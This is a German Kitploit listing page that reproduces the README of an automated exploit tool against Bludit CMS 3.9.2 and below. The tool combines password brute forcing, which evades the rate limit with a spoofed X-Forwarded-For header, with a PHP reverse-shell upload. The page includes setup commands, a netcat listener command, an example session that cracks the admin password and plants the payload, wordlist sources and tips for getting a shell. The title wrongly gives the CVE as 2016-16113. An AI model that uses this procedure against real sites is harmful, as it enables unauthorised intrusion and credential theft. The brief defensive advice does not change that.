Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2016-16113-POC — cve-2016-16113 | Kitploit
Tools/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
PasswortangriffePayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

Repository anzeigen
12vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Get RCE – Bludit CMS Exploit

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

Ein automatisiertes Exploitation-Tool, das CVE-2019-17240 (Authentication Bypass) und CVE-2019-16113 (Arbitrary File Upload) kombiniert, um Remote-Code-Ausführung auf angreifbaren Bludit CMS-Installationen zu erreichen.

⚠️ Rechtlicher Hinweis

NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool ist für Sicherheitsexperten bestimmt, die autorisierte Penetrationstests durchführen, und für Sicherheitsforscher, die sich innerhalb der gesetzlichen Grenzen bewegen. Unautorisierter Zugriff auf Computersysteme ist illegal nach Gesetzen wie dem Computer Fraud and Abuse Act (CFAA) in den USA und ähnlichen Gesetzen weltweit.

Durch die Nutzung dieses Tools erklären Sie sich damit einverstanden:

  • Nur Systeme zu testen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung haben
  • Alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten
  • Die volle Verantwortung für Ihre Handlungen zu übernehmen

Der Autor übernimmt keine Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

📋 Übersicht

Dieses Exploit automatisiert folgende Schritte:

  1. Überprüfung der Zielerreichbarkeit
  2. Umgehung der Authentifizierung durch Brute-Force (Ausnutzung von CVE-2019-17240)
  3. Hochladen einer schädlichen PHP-Reverse-Shell (Ausnutzung von CVE-2019-16113)
  4. Aufbau einer Reverse-Shell-Verbindung

Details zu den Schwachstellen

  • CVE-2019-17240: Authentifizierungsumgehung durch unzureichende Ratenbegrenzung (umgangen durch Manipulation des X-Forwarded-For-Headers)
  • CVE-2019-16113: Schwachstelle beim Datei-Upload, die die Ausführung von schädlichem PHP-Code ermöglicht

Betroffene Versionen: Bludit CMS Versionen 3.9.2 und niedriger

🚀 Funktionen

  • ✅ Automatisierte Prüfung der Zielerreichbarkeit
  • ✅ Authentifizierungsumgehung durch Brute-Force
  • ✅ Benutzernamen-Ermittlung
  • ✅ Kombinierte Brute-Force für Benutzername + Passwort
  • ✅ Automatische CSRF-Token-Verwaltung
  • ✅ Generierung von PHP-Reverse-Shell-Payloads
  • ✅ .htaccess-Upload für verbesserte Ausnutzung
  • ✅ Verbindungsüberprüfung

📦 Voraussetzungen

  • Python 3.6+
  • Erforderliche Python-Pakete:
    • requests

🔧 Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# Abhängigkeiten installieren
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.25.0

💻 Verwendung

Grundlegende Verwendung

root@kitploit:~
python3 get_rce.py

Das Skript fordert Sie auf:

  1. Ziel-URL (z.B. https://target.com)
  2. IP-Adresse Ihres Listeners
  3. Port Ihres Listeners
  4. Ob der Benutzername per Brute-Force ermittelt werden soll
  5. Pfade zu Wortlisten

Einrichten Ihres Listeners

Starten Sie vor dem Ausführen des Exploits einen netcat-Listener:

root@kitploit:~
nc -lvnp 4444

Ersetzen Sie 4444 durch den von Ihnen gewählten Port.

Beispiel-Session

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

Angriffsmodi

Modus 1: Bekannter Benutzername + Passwort-Brute-Force

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

Modus 2: Vollständige Anmeldedaten-Brute-Force

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 Empfohlene Wortlisten

  • SecLists: https://github.com/danielmiessler/SecLists

    • Benutzernamen: SecLists/Usernames/Names/names.txt
    • Passwörter: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 Wie es funktioniert

  1. Zielvalidierung: Prüft, ob das Ziel erreichbar ist
  2. Authentifizierungsumgehung:
    • Manipuliert den X-Forwarded-For-Header, um die Ratenbegrenzung zu umgehen
    • Führt Brute-Force auf Anmeldedaten mit bereitgestellten Wortlisten durch
    • Behandelt CSRF-Token automatisch
  3. Ausnutzung:
    • Lädt PHP-Reverse-Shell in /bl-content/tmp/ hoch
    • Lädt .htaccess-Datei hoch, um die Ausführung sicherzustellen
    • Löst das Payload aus, um Reverse-Shell herzustellen
  4. Shell-Zugriff: Stellt die Verbindung zu Ihrem Listener her

🛡️ Abwehrmaßnahmen

Falls Sie Systemadministrator sind:

  • Aktualisieren Sie sofort auf Bludit 3.9.3 oder neuer
  • Implementieren Sie eine ordnungsgemäße Ratenbegrenzung basierend auf Sitzungen, nicht auf IP-Adressen
  • Validieren Sie alle Datei-Uploads (Typ, Erweiterung, Inhalt)
  • Verwenden Sie Web Application Firewalls (WAF)
  • Überwachen Sie das Verzeichnis /bl-content/tmp/ auf verdächtige Dateien
  • Setzen Sie strenge Passwortrichtlinien durch
  • Aktivieren Sie Kontosperrmechanismen

🐛 Fehlerbehebung

Problem: "The target seems to be down"

  • Überprüfen Sie, ob die URL korrekt ist und das Protokoll (http/https) enthält
  • Prüfen Sie Ihre Netzwerkverbindung
  • Stellen Sie sicher, dass das Ziel tatsächlich Bludit ausführt

Problem: "Login failed"

  • Überprüfen Sie, ob die Anmeldedaten korrekt sind
  • Versuchen Sie eine umfangreichere Wortliste
  • Prüfen Sie, ob das Ziel zusätzliche Authentifizierungsmechanismen hat

Problem: "No shell received"

  • Überprüfen Sie, ob Ihr Listener läuft
  • Prüfen Sie die Firewall-Regeln auf beiden Seiten
  • Stellen Sie sicher, dass Listener-IP und -Port korrekt und erreichbar sind

🔗 Referenzen

  • CVE-2019-17240 Details
  • CVE-2019-16113 Details
  • Bludit Offizielle Website

👤 Autor

d3vn0mi

📄 Lizenz

Dieses Projekt wird nur zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Siehe den Haftungsausschluss am Anfang dieser README.

🤝 Mitwirken

Beiträge, Probleme und Funktionsanfragen sind willkommen! Besuchen Sie gerne die Issues-Seite.

⭐ Danksagungen

  • Der Security-Research-Community für die Entdeckung und Dokumentation dieser Schwachstellen
  • Dem Bludit-Team für die schnelle Reaktion bei der Behebung dieser Probleme
Tool herunterladen